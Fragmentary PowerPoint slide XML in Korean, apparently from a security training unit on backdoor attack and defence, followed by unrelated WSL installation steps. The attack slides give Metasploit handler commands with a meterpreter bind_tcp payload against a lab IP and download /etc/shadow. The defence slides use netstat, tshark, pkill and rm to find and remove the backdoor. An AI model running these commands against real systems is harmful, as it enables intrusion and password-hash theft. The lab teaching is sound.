              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령으로 공격 서버의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># ifconfig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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="100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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>use exploit/multi/handler </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> &gt; use exploit/multi/handler</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Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/x86/meterpreter/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>bind_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> exploit(handler) &gt; set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/x86/meterpreter/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>bind_tcp</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6) Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>콘솔에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>show options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> exploit(handler) &gt; show options</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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7) RHOST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 백도어가 실행 중인 서버 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소 입력 및 공격 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> exploit(handler) &gt; set RHOST 10.10.1.14 </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> exploit(handler) &gt; exploit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8) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령어 실행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>meterpreter &gt; ls</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9) /etc/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다운로드</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>meterpreter &gt; download /etc/shadow</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10) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>세션 및 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Metasploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>meterpreter &gt; exit</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> exploit(handler) &gt; exit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11) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>다운로드받은</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc/shadow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># cat shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>1) acheck </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>입력 및 다운로드 받은 파일 이름 입력</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># aehcek</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/root/shadow</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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/Training/Unit/Sys/13</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> 13. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t> 공격 및 방어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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ko-KR" altLang="en-US" sz="1000" kern="0" spc="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2) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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4) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> | more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령으로 열린 포트 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> | more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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>패킷 캡처 및 분석</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –c 200 –w packet.txt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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –r packet.txt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ko-KR" altLang="en-US" sz="1000"/>
              <a:t>사용자 서버와 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>192.168.1.169 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>서버 간에 많은 통신이 수행되고 있음을 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>3) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>해당 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>와 통신하는 포트 및 프로세스 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># netstat -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tnap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> | more</a:t>
            </a:r>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파일을 찾는 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>find </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>find / -name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p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:endParaRPr lang="en-US"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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 의심 프로세스 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>ps</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> –ef | grep </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/elf</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>해당 프로세스 강제 종료</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>pkill</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.elf</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>백도어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 의심 프로그램 파일 삭제</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># rm /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.elf</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>키코드</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 획득</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t># check</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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8. Username </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 입력하라는 메시지가 출력된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>새로 설치할 우분투의 사용자명과 비밀번호를 여기서 설정하면 된다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기존 윈도우의 계정이름</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>비밀번호와 똑같이 할 필요는 없다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>기억하기 어려우면 똑같이 해도 됨</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="900">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>9. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>설정이 완료되면 이 창을 닫고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다시 관리자 권한으로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> 을 실행시킨다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령창에 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wsl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>을 쳤을 때 다음과 같은 화면이 나오면 정상적으로 설치가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>완료된것</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10. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다시 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“exit” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 입력하여 터미널로 나가준다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11. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다음 명령어를 입력하여  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>wsl</a:t>
            </a:r>
            <a:r>
